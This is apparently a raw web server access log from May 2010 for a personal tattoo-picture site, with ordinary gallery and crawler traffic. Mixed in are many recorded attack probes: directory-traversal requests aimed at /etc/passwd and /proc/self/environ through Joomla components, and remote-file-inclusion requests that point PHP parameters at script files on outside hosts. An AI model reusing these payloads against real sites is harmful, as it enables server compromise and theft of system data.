218.215.49.223 - - [22/May/2010:22:03:41 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:41 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:41 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:41 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:41 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:43 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:43 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:45 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:03:45 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:09 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:10 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:10 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:10 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:10 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:10 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:11 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:12 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:13 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:13 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:14 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
173.236.37.218 - - [22/May/2010:22:04:28 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:22:04:28 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:22:04:28 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
218.215.49.223 - - [22/May/2010:22:04:36 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:37 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:37 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
218.215.49.223 - - [22/May/2010:22:04:37 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16)"
97.74.75.246 - - [22/May/2010:22:05:41 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:22:05:41 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:22:05:41 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
174.121.59.218 - - [22/May/2010:22:06:50 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:22:06:51 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:22:06:51 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
87.250.255.243 - - [22/May/2010:22:12:20 -0500] "GET /logs/access_log.1258502400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
112.216.153.186 - - [22/May/2010:22:12:36 -0500] "GET /main.php?path=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
112.216.153.186 - - [22/May/2010:22:12:36 -0500] "GET /logs/access_log.1270771200/main.php?path=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
112.216.153.186 - - [22/May/2010:22:12:36 -0500] "GET /logs/main.php?path=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
112.216.153.186 - - [22/May/2010:22:12:36 -0500] "GET /logs/access_log.1264204800/main.php?path=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:22:14:37 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:22:14:37 -0500] "GET /logs/access_log.1270598400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:22:14:37 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
112.216.153.186 - - [22/May/2010:22:16:12 -0500] "GET /main.php?path=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
112.216.153.186 - - [22/May/2010:22:16:12 -0500] "GET /logs/access_log.1263081600/main.php?path=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
112.216.153.186 - - [22/May/2010:22:16:12 -0500] "GET /logs/main.php?path=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
112.216.153.186 - - [22/May/2010:22:16:47 -0500] "GET /logs/access_log.1266537600/main.php?path=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.115.111.248 - - [22/May/2010:22:17:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.195.240 - - [22/May/2010:22:18:33 -0500] "GET /logs/access_log.1245283200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.235.24.251 - - [22/May/2010:22:18:59 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.11.58 - - [22/May/2010:22:20:09 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.831"
67.195.112.180 - - [22/May/2010:22:20:59 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [22/May/2010:22:20:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "http://o.webring.com/hub?ring=tattoos;id=100;prvw""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [22/May/2010:22:27:14 -0500] "GET /logs/access_log.1260576000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
119.235.24.251 - - [22/May/2010:22:27:20 -0500] "GET /logs/access_log.1270598400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.59.218 - - [22/May/2010:22:30:40 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:22:30:40 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
70.38.71.147 - - [22/May/2010:22:30:59 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
70.38.71.147 - - [22/May/2010:22:30:59 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.133.201.194 - - [22/May/2010:22:32:46 -0500] "GET //playlist.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.201.194 - - [22/May/2010:22:33:11 -0500] "GET /logs//playlist.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [22/May/2010:22:33:11 -0500] "GET /logs/access_log.1266019200//playlist.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.133.201.194 - - [22/May/2010:22:33:13 -0500] "GET /logs/access_log.1265587200//playlist.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
123.125.68.78 - - [22/May/2010:22:33:52 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
208.113.240.35 - - [22/May/2010:22:37:28 -0500] "GET //blend_data/blend_common.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.113.240.35 - - [22/May/2010:22:37:28 -0500] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.113.240.35 - - [22/May/2010:22:37:28 -0500] "GET /logs/access_log.1262563200//blend_data/blend_common.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.113.240.35 - - [22/May/2010:22:38:35 -0500] "GET /logs/access_log.1272153600//blend_data/blend_common.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.250.255.243 - - [22/May/2010:22:39:20 -0500] "GET /logs/access_log.1266624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [22/May/2010:22:43:29 -0500] "GET /logs/access_log.1223769600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [22/May/2010:22:45:37 -0500] "GET /logs/access_log.1233360000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
119.235.24.251 - - [22/May/2010:22:46:52 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:22:46:52 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:22:46:52 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:22:48:20 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:22:48:20 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
119.235.24.251 - - [22/May/2010:22:48:20 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.5.54.51 - - [22/May/2010:22:49:05 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [22/May/2010:22:49:06 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.199.183 - - [22/May/2010:22:49:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.224.242 - - [22/May/2010:22:49:31 -0500] "GET /logs/*.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:22:49:31 -0500] "GET /*.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:22:49:35 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:22:49:35 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
89.111.173.43 - - [22/May/2010:22:50:15 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
89.111.173.43 - - [22/May/2010:22:50:16 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
99.198.118.114 - - [22/May/2010:22:50:24 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
99.198.118.114 - - [22/May/2010:22:50:24 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
173.236.37.218 - - [22/May/2010:22:50:43 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:22:50:43 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:22:51:24 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:22:51:24 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.250.255.243 - - [22/May/2010:22:51:26 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.51 - - [22/May/2010:22:51:33 -0500] "GET /logs/access_log.1158278400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [22/May/2010:22:53:08 -0500] "GET /logs/access_log.1268524800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:10 -0500] "GET /logs/access_log.1268611200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:12 -0500] "GET /logs/access_log.1268697600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:14 -0500] "GET /logs/access_log.1268784000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:17 -0500] "GET /logs/access_log.1268870400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:19 -0500] "GET /logs/access_log.1268956800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:21 -0500] "GET /logs/access_log.1269043200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:24 -0500] "GET /logs/access_log.1269129600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:49 -0500] "GET /logs/access_log.1269216000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [22/May/2010:22:53:52 -0500] "GET /logs/access_log.1269302400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
74.55.224.242 - - [22/May/2010:22:59:42 -0500] "GET /logs/*.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:22:59:42 -0500] "GET /*.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
72.5.54.51 - - [22/May/2010:23:01:24 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [22/May/2010:23:01:24 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.238.172.21 - - [22/May/2010:23:01:30 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
87.238.172.21 - - [22/May/2010:23:01:30 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.5.54.51 - - [22/May/2010:23:01:41 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [22/May/2010:23:02:26 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
